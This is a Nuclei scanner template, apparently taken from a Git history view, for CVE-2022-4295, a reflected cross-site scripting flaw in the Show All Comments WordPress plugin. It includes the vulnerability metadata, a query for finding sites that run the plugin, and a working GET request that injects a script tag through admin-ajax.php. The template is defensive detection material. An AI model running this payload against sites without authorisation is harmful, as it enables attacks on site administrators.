nuclei-templates/http/cves/2022/CVE-2022-4295.yaml

46 lines
1.8 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2022-4295
info:
name: Show all comments < 7.0.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
2023-09-06 11:59:08 +00:00
remediation: |
Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability.
2023-07-07 09:38:49 +00:00
reference:
- https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56
- https://nvd.nist.gov/vuln/detail/CVE-2022-4295
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-4295
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.00071
epss-percentile: 0.29387
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:*
2023-07-07 09:38:49 +00:00
metadata:
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: appjetty
product: show_all_comments
2023-09-06 11:59:08 +00:00
framework: wordpress
publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
2023-07-11 19:49:27 +00:00
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page
2023-07-07 09:38:49 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "Select </option>")'
condition: and
# digest: 490a00463044022058516472b32e613b3ef3f1b0a8021e7b53a6841407ccc6ed478dca6dca3e751c022078965b4e1490cb20193ce8e619217afe3802e0133b07b2fde117cd0819c5c623:922c64590222798bb761d5b6d8e72950